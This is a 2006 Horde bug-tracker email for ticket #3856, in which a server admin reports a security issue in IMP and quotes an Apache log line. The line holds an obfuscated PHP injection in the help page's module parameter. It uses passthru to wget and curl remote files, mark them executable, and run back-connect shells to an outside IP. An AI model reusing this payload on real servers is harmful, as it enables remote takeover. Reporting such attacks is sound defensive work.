[Tickets #3856] NEW: security issue

[bugs@bugs.horde.org]

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/?id=3856
-----------------------------------------------------------------------
 Ticket             | 3856
 Created By         | admin at cw3host.com
 Summary            | security issue
 Queue              | IMP
 Version            | HEAD
 State              | Unconfirmed
 Priority           | 3. High
 Type               | Bug
 Owners             | 
-----------------------------------------------------------------------


admin at cw3host.com (2006-04-29 18:44) wrote:

Found this in my logs after cleaning out hacker files in TMP directory
Server type is Red Hat Linux running H-Sphere

/hsphere/shared/apache/htdocs//horde//services/help/index.php 216.65.11.137
- - [28/Apr/2006:10:00:12 -0500] "GET
//horde//services/help/?show=about&module=;\".passthru(\"wget%20http:\".chr(
47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;mv%20p
ing.txt%20temp2006;perl%20temp2006%20217.160.242.90%20801;wget%20http:\".chr
(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+
x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:
\".chr(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chm
od%20+x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;cd%20\".chr(47).\"
tmp\".chr(47).\";curl%20-o%20temp2006%20http:\".chr(47).\"\".chr(47).\"81.58
.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;while%20[%201%20];do%20perl%20
temp2006%20217.160.242.90%208081;done;wget%20http:\".chr(47).\"\".chr(47).\"
81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".chr(47)
.\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:\".chr(47).\"\".chr(
47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".c
hr(47).\"ping%20217.160.242.90%208081\");'. HTTP/1.1" 200 3452 "-" "-"